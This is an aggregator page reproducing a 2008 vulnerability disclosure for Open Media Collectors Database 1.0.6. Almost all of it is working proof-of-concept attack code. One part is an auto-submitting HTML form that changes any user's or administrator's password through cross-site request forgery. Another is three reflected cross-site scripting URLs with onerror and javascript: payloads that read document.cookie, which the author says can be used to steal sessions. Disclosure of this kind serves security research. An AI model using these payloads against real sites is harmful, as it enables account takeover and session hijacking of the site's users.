Lucene search

K

omcd-xssxsrf.txt

🗓️ 31 Aug 2008 00:00:00Reported by C1c4Tr1ZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

CSRF and XSS vulnerabilities allow password changes and cookie theft in Open Media Collectors Database.

Show more
Code
`#=======================================================================#  
.____ _________ ._.  
| | ______ _ __/ _____/ ____ ____| |  
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |  
| |__( <_> ) / / \ ___/\ \___\|  
|_______ \____/ \/\_/ /_______ /\___ >\___ >_  
\/ \/ \/ \/\/  
(http://wwwlowsec.org)  
#========================================================================#  
Author: C1c4Tr1Z  
Date: 28/08/08  
Application: Open Media Collectors Database 1.0.6 (15/05/2007)  
Product WebSite: http://opendb.iamvegan.net/  
  
#========================================================================#  
#============================[CSRF]======================================#  
  
We can change any user or admin password by CSRF, only knowing the user's  
username.  
  
POC:  
  
<form name="CSRF" method="POST" action="http://www.victim.com/dir_to_opmcd/user_admin.php">  
<input type="hidden" name="user_id" value="USERNAME">  
<input type="password" name="pwd" value="NEW_PASSWORD">  
<input type="password" name="confirmpwd" value="NEW_PASSWORD">  
<input type="hidden" name="redirect_link" value="">  
<input type="hidden" name="redirect_url" value="">  
<input type="hidden" name="op" value="update_password">  
</form>  
<script>CSRF.submit()</script>  
  
  
#========================================================================#  
#=============================[XSS]======================================#  
  
With some JavaScript knowledge, we are able to execute JS codes to steal  
cookies to use the sessions, or another changes/actions.  
  
POC:  
  
/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>  
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>  
*/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)  
  
(*) This vector modifies the "Back to Statistics" (that we also can change),  
and when the user clicks on the link, the javascript code is executed  
  
#========================================================================#  
#========================================================================#  
Contact: C1c4Tr1Z <[email protected]>  
(http://wwwlowsec.org)  
LowSec! Web Application Security (Lab).  
Deus ex Machina  
#========================================================================#  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report